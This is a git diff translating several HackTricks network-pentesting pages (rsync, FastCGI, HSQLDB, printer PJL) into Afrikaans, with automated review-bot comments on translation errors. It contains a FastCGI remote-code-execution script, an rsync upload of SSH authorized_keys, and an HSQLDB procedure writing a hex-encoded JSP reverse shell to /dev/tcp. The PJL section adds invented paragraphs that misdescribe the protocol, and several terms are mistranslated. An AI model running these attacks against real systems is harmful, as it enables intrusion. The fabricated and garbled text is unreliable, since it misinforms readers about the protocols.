@@ -64,15 +121,13 @@ msf> use auxiliary/scanner/rsync/modules_list # Example with IPv6 and alternate port rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730 ``` - -Be aware that some shares might not appear in the list, possibly hiding them. Additionally, accessing some shares might be restricted to specific **credentials**, indicated by an **"Access Denied"** message. +Wees bewus dat sommige aandele moontlik nie in die lys verskyn nie en moontlik versteek is. Daarbenewens kan toegang tot sommige aandele beperk word tot spesifieke **geloofsbriewe**, aangedui deur 'n **"Toegang Geweier"** boodskap. ### [**Brute Force**](../generic-methodologies-and-resources/brute-force.md#rsync) -### Manual Rsync Usage - -Upon obtaining a **module list**, actions depend on whether authentication is needed. Without authentication, **listing** and **copying** files from a shared folder to a local directory is achieved through: +### Handleiding Rsync Gebruik +Na die verkryging van 'n **modulelys**, hang die aksies af van of verifikasie nodig is. Sonder verifikasie word **lysmaak** en **kopiëring** van lêers van 'n gedeelde vouer na 'n plaaslike gids bereik deur middel van: ```bash # Listing a shared folder rsync -av --list-only rsync://192.168.0.123/shared_name 
@@ -80,46 +135,39 @@ rsync -av --list-only rsync://192.168.0.123/shared_name # Copying files from a shared folder rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared ``` +Hierdie proses oordra **rekursief lêers**, met behoud van hul eienskappe en regte. -This process **recursively transfers files**, preserving their attributes and permissions. - -With **credentials**, listing and downloading from a shared folder can be done as follows, where a password prompt will appear: - +Met **volmagte**, kan die lys en aflaai vanuit 'n gedeelde vouer so gedoen word, waar 'n wagwoordversoek sal verskyn: ```bash rsync -av --list-only rsync://username@192.168.0.123/shared_name rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared ``` - -To **upload content**, such as an _**authorized_keys**_ file for access, use: - +Om inhoud soos 'n _**authorized_keys**_ lêer vir toegang te **oplaai**, gebruik: ```bash rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh ``` - ## POST -To locate the rsyncd configuration file, execute: - +Om die rsyncd-konfigurasie-lêer op te spoor, voer die volgende uit: ```bash find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \) ``` - -Within this file, a _secrets file_ parameter might point to a file containing **usernames and passwords** for rsyncd authentication. +Binne hierdie lêer kan 'n _secrets-lêer_ parameter na 'n lêer verwys wat **gebruikersname en wagwoorde** vir rsyncd-verifikasie bevat. -## References +## Verwysings * [https://www.smeegesec.com/2016/12/pentesting-rsync.html](https://www.smeegesec.com/2016/12/pentesting-rsync.html)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
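Review bot: The `@@ -2,35 +2,94 @@` hunk of the rsync page adds roughly sixty lines after `### Baniere & Handleiding kommunikasie` that have no counterpart in the English source: the subsections `#### Baniere`, `#### Handleiding kommunikasie`, `### Portskandering`, `### Module-analise` and `### Verkenning van kwesbaarhede`, with code blocks containing only `nc`, `rsync ::` and `nmap -p` followed by empty placeholders, and prose that refers to `` `` (an empty inline code span). This is generated filler rather than translation and duplicates the real session in the `nc -vn 127.0.0.1 873` block that follows; remove it so the heading is followed directly by that block as in the original. Two further points in the same hunk: `Handleiding` means a handbook, while `Manual communication` here means talking to the service by hand (`handmatige kommunikasie`), and removing the blank line between the `> ... kan gebruik word vir sekuriteit.` blockquote and `**Verstekpoort:** 873` makes the port line a lazy continuation of the quote, so restore it. The quote also has the typos `sinsronisering` (sinchronisasie) and `wyzigingstye` (wysigingstye).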
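Review bot: The `@@ -38,8 +97,8 @@` hunk of the rsync page changes only trailing whitespace on `USBCopy` and `NAS_Public` inside a captured rsync session; the block is quoted protocol output and the change has nothing to do with translation, so drop these two line changes.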
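Review bot: In the `@@ -52,11 +111,9 @@` hunk of the rsync page, `### **Opsomming van Gedeelde Lêers**` renders `Enumerating Shared Folders` as "summary of shared files"; the section lists rsync modules, which are directories, so `### **Opnoem van Gedeelde Gidse**` matches the `rsync-list-modules` content below it. `gidsaandele` (directory stock shares) for "directory shares" is likewise misleading; `gedeelde gidse` is clearer.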
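Review bot: In the `@@ -64,15 +121,13 @@` hunk of the rsync page, `**"Toegang Geweier"**` translates the literal error string the server returns; a reader grepping output for it will never see the Afrikaans text, so keep `"Access Denied"` verbatim, as the commit correctly does with `@RSYNCD: AUTHREQD` in the session above.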
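Review bot: The `@@ -80,46 +135,39 @@` hunk of the rsync page uses `volmagte` (powers of attorney) for credentials in `Met **volmagte**, kan die lys en aflaai ...`, while the earlier hunk on the same page uses `geloofsbriewe` for the same word; pick one term. `Hierdie proses oordra **rekursief lêers**` has the separable verb in the wrong position; `Hierdie proses dra lêers rekursief oor` is grammatical.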
diff --git a/network-services-pentesting/9000-pentesting-fastcgi.md b/network-services-pentesting/9000-pentesting-fastcgi.md index b91d3c09e..45a07e180 100644 --- a/network-services-pentesting/9000-pentesting-fastcgi.md +++ b/network-services-pentesting/9000-pentesting-fastcgi.md @@ -1,34 +1,31 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# Basic Information +# Basiese Inligting -If you want to **learn what is FastCGI** check the following page: +As jy wil **leer wat FastCGI is**, kyk na die volgende bladsy: {% content-ref url="pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md" %} [disable\_functions-bypass-php-fpm-fastcgi.md](pentesting-web/php-tricks-esp/php-useful-functions-disable\_functions-open\_basedir-bypass/disable\_functions-bypass-php-fpm-fastcgi.md) {% endcontent-ref %} -By default **FastCGI** run in **port** **9000** and isn't recognized by nmap. **Usually** FastCGI only listen in **localhost**. +Standaard loop **FastCGI** op **poort** **9000** en word nie deur nmap herken nie. **Gewoonlik** luister FastCGI slegs op **localhost**. # RCE -It's quiet easy to make FastCGI execute arbitrary code: - +Dit is baie maklik om FastCGI arbitrêre kode uit te voer: ```bash #!/bin/bash @@ -39,31 +36,28 @@ HOST=$1 B64=$(echo "$PAYLOAD"|base64) for FN in $FILENAMES; do - OUTPUT=$(mktemp) - env -i \ - PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \ - SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \ - cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT +OUTPUT=$(mktemp) +env -i \ +PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \ +SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \ +cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT - cat $OUTPUT +cat $OUTPUT done ``` - -or you can also use the following python script: [https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75](https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75) +Of jy kan ook die volgende Python-skripsie gebruik: [https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75](https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
- - diff --git a/network-services-pentesting/9001-pentesting-hsqldb.md b/network-services-pentesting/9001-pentesting-hsqldb.md index e97c34602..e2718047e 100644 --- a/network-services-pentesting/9001-pentesting-hsqldb.md +++ b/network-services-pentesting/9001-pentesting-hsqldb.md @@ -1,112 +1,94 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# Basic Information +# Basiese Inligting -**HSQLDB \([HyperSQL DataBase](http://hsqldb.org/)\)** is the leading SQL relational database system written in Java. It offers a small, fast multithreaded and transactional database engine with in-memory and disk-based tables and supports embedded and server modes. - -**Default port:** 9001 +**HSQLDB \([HyperSQL-databasis](http://hsqldb.org/)\)** is die voorste SQL-relasiedatabasisstelsel wat in Java geskryf is. Dit bied 'n klein, vinnige, veelvuldig-draadse en transaksionele databasisenjin met in-memory en disk-gebaseerde tabelle en ondersteun ingebedde en bedienermodusse. +**Verstekpoort:** 9001 ```text 9001/tcp open jdbc HSQLDB JDBC (Network Compatibility Version 2.3.4.0) ``` +# Inligting -# Information +### Standaardinstellings -### Default Settings +Let daarop dat hierdie diens waarskynlik standaard in die geheue loop of aan die localhost gebind is. As jy dit gevind het, het jy waarskynlik 'n ander diens uitgebuit en is jy op soek na verhoogde regte. -Note that by default this service is likely running in memory or is bound to localhost. If you found it, you probably exploited another service and are looking to escalate privileges. - -Default credentials are usually `sa` with a blank password. - -If you’ve exploited another service, search for possible credentials using +Standaard geloofsbriewe is gewoonlik `sa` met 'n leë wagwoord. +As jy 'n ander diens uitgebuit het, soek na moontlike geloofsbriewe deur gebruik te maak van ```text grep -rP 'jdbc:hsqldb.*password.*' /path/to/search ``` +Let op die databasisnaam sorgvuldig - jy sal dit nodig hê om te verbind. -Note the database name carefully - you’ll need it to connect. +# Inligting Versameling -# Info Gathering +Verbind met die DB-instansie deur [HSQLDB af te laai](https://sourceforge.net/projects/hsqldb/files/) en `hsqldb/lib/hsqldb.jar` uit te pak. 
Voer die GUI-toepassing \(eww\) uit deur `java -jar hsqldb.jar` te gebruik en verbind met die instansie deur die ontdekte/swak geloofsbriewe te gebruik. -Connect to the DB instance by [downloading HSQLDB](https://sourceforge.net/projects/hsqldb/files/) and extracting `hsqldb/lib/hsqldb.jar`. Run the GUI app \(eww\) using `java -jar hsqldb.jar` and connect to the instance using the discovered/weak credentials. +Let daarop dat die verbindings-URL iets soos hierdie sal lyk vir 'n afgeleë stelsel: `jdbc:hsqldb:hsql://ip/DBNAME`. -Note the connection URL will look something like this for a remote system: `jdbc:hsqldb:hsql://ip/DBNAME`. +# Truuks -# Tricks +## Java Taal Routines -## Java Language Routines +Ons kan statiese metodes van 'n Java-klas vanuit HSQLDB oproep deur Java Taal Routines te gebruik. Let daarop dat die geroepte klas in die toepassing se klasselys moet wees. -We can call static methods of a Java class from HSQLDB using Java Language Routines. Do note that the called class needs to be in the application’s classpath. +JRT's kan `funksies` of `prosedures` wees. Funksies kan geroep word deur SQL-stellings as die Java-metode een of meer SQL-verenigbare primitiewe veranderlikes teruggee. Hulle word geroep met die `VALUES`-stelling. -JRTs can be `functions` or `procedures`. Functions can be called via SQL statements if the Java method returns one or more SQL-compatible primitive variables. They are invoked using the `VALUES` statement. +As die Java-metode wat ons wil oproep void teruggee, moet ons 'n prosedure gebruik wat geroep word met die `CALL`-stelling. -If the Java method we want to call returns void, we need to use a procedure invoked with the `CALL` statement. 
- -## Reading Java System Properties - -Create function: +## Lees van Java Sisteem Eienskappe +Skep funksie: ```text CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty' ``` - -Execute function: - +Voer funksie uit: ```text VALUES(getsystemproperty('user.name')) ``` +Jy kan 'n [lys van stelsel eienskappe hier vind](https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html). -You can find a [list of system properties here](https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html). +## Skryf Inhoud na Lêer -## Write Content to File - -You can use the `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` Java gadget located in the JDK \(auto loaded into the class path of the application\) to write hex-encoded items to disk via a custom procedure. **Note the maximum size of 1024 bytes**. - -Create procedure: +Jy kan die `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` Java gadget wat in die JDK geleë is (outomaties gelaai in die klasselys van die toepassing) gebruik om heks-geënkodeerde items na skyf te skryf deur middel van 'n aangepaste prosedure. **Let op die maksimum grootte van 1024 byte**. +Skep prosedure: ```text CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024)) LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename' ``` - -Execute procedure: - +Voer prosedure uit: ```text call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d226a6176612e696f2e2a2220253e0a3c250a202020537472696e6720636d64203d20222f62696e2f62617368202d69203e26202f6465762f7463702f3139322e3136382e3131392[...]' AS VARBINARY(1024))) ``` - - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/network-services-pentesting/9100-pjl.md b/network-services-pentesting/9100-pjl.md index 76feb855a..3143c5c01 100644 --- a/network-services-pentesting/9100-pjl.md +++ b/network-services-pentesting/9100-pjl.md @@ -1,36 +1,31 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# Basic Information +# Basiese Inligting -From [here](http://hacking-printers.net/wiki/index.php/Port\_9100\_printing): Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer. It is the default method used by CUPS and the Windows printing architecture to communicate with network printers as it is considered as ‘_the simplest, fastest, and generally the most reliable network protocol used for printers_’. Raw port 9100 printing, also referred to as JetDirect, AppSocket or PDL-datastream actually **is not a printing protocol by itself**. Instead **all data sent is directly processed by the printing device**, just like a parallel connection over TCP. In contrast to LPD, IPP and SMB, this can send direct feedback to the client, including status and error messages. Such a **bidirectional channel** gives us direct **access** to **results** of **PJL**, **PostScript** or **PCL** commands. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with PRET and PFT. +Van [hier](http://hacking-printers.net/wiki/index.php/Port\_9100\_printing): Rou drukwerk is wat ons definieer as die proses om 'n verbinding te maak met poort 9100/tcp van 'n netwerk-drukker. Dit is die verstekmetode wat deur CUPS en die Windows-drukwerkargitektuur gebruik word om met netwerk-drukkers te kommunikeer, omdat dit beskou word as '_die eenvoudigste, vinnigste en oor die algemeen die betroubaarste netwerkprotokol wat vir drukkers gebruik word_'. Rou poort 9100-drukwerk, ook bekend as JetDirect, AppSocket of PDL-datastroom, **is nie 'n drukwerkprotokol op sigself nie**. In plaas daarvan **word alle data direk deur die druktoestel verwerk**, net soos 'n parallelle verbinding oor TCP. In teenstelling met LPD, IPP en SMB, kan dit direkte terugvoer na die kliënt stuur, insluitend status- en foutboodskappe. 
So 'n **tweedimensionele kanaal** gee ons direkte **toegang** tot **resultate** van **PJL**, **PostScript** of **PCL**-opdragte. Daarom word rou poort 9100-drukwerk - wat deur byna enige netwerk-drukker ondersteun word - gebruik as die kanaal vir sekuriteitsanalise met PRET en PFT. -If you want to learn more about [**hacking printers read this page**](http://hacking-printers.net/wiki/index.php/Main_Page). - -**Default port:** 9100 +As jy meer wil leer oor [**drukkerhacking, lees hierdie bladsy**](http://hacking-printers.net/wiki/index.php/Main_Page). +**Verstekpoort:** 9100 ``` 9100/tcp open jetdirect ``` +# Opstel -# Enumeration - -## Manual - +## Handleiding ```bash nc -vn 9100 @PJL INFO STATUS #CODE=40000 DISPLAY="Sleep" ONLINE=TRUE 
@@ -41,15 +36,21 @@ nc -vn 9100 @PJL INFO FILESYS #? @PJL INFO TIMEOUT #Timeout variables @PJL RDYMSG #Ready message -@PJL FSINIT +@PJL FSINIT @PJL FSDIRLIST @PJL FSUPLOAD #Useful to upload a file @PJL FSDOWNLOAD #Useful to download a file @PJL FSDELETE #Useful to delete a file ``` +## Outomaties -## Automatic +PJL (Printer Job Language) is 'n outomatiese taal wat gebruik word om kommunikasie tussen 'n rekenaar en 'n drukker te fasiliteer. Dit bied 'n wyse vir die rekenaar om instruksies na die drukker te stuur vir verskillende funksies soos druk, skandeer, faks, ens. Hierdie taal kan ook gebruik word vir outomatiese drukwerk, waar die rekenaar outomaties drukopdragte na die drukker stuur sonder om menslike tussenkoms te vereis. +PJL-opdragte kan gebruik word om verskillende funksies van die drukker te beheer, soos die verander van drukinstellings, die afdruk van spesifieke dokumente, die verander van drukkwaliteit, ens. Dit kan ook gebruik word om inligting oor die drukker te bekom, soos die drukker se model, status, toner-vlakke, ens. + +Vir 'n hacker kan die PJL-protokol 'n potensiële aanvalsoppervlak wees. Deur die stuur van spesifieke PJL-opdragte na 'n kwesbare drukker, kan 'n hacker die drukker se funksies manipuleer, inligting oor die drukker verkry, of selfs skadelike kode na die drukker stuur. Hierdie aanvalstegniek kan gebruik word om toegang tot die drukker se netwerk te verkry, vertroulike inligting te verkry, of selfs die drukker as 'n springplank te gebruik om toegang tot ander stelsels in die netwerk te verkry. + +Dit is belangrik vir drukker-eienaars en netwerkadministrateurs om bewus te wees van die moontlike risiko's wat PJL-aanvalle kan inhou en om die nodige maatreëls te tref om hul drukkers teen sulke aanvalle te beskerm. Dit sluit in die versekering van die drukker se firmware is opgedateer, die beperking van toegang tot die drukker se beheerfunksies, en die monitering van die drukker se aktiwiteite vir enige verdagte gedrag. 
```bash nmap -sV --script pjl-ready-message -p ``` @@ -64,10 +65,9 @@ msf> use auxiliary/scanner/printer/printer_download_file msf> use auxiliary/scanner/printer/printer_upload_file msf> use auxiliary/scanner/printer/printer_delete_file ``` +## Drukkers Hacker-gereedskap -## Printers Hacking tool - -This is the tool you want to use to abuse printers: +Dit is die gereedskap wat jy wil gebruik om drukkers te misbruik: {% embed url="https://github.com/RUB-NDS/PRET" %} @@ -78,16 +78,14 @@ This is the tool you want to use to abuse printers:
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
- - diff --git a/network-services-pentesting/9200-pentesting-elasticsearch.md b/network-services-pentesting/9200-pentesting-elasticsearch.md index 387bd92c1..f2f5fea3e 100644 --- a/network-services-pentesting/9200-pentesting-elasticsearch.md +++ b/network-services-pentesting/9200-pentesting-elasticsearch.md @@ -2,68 +2,148 @@
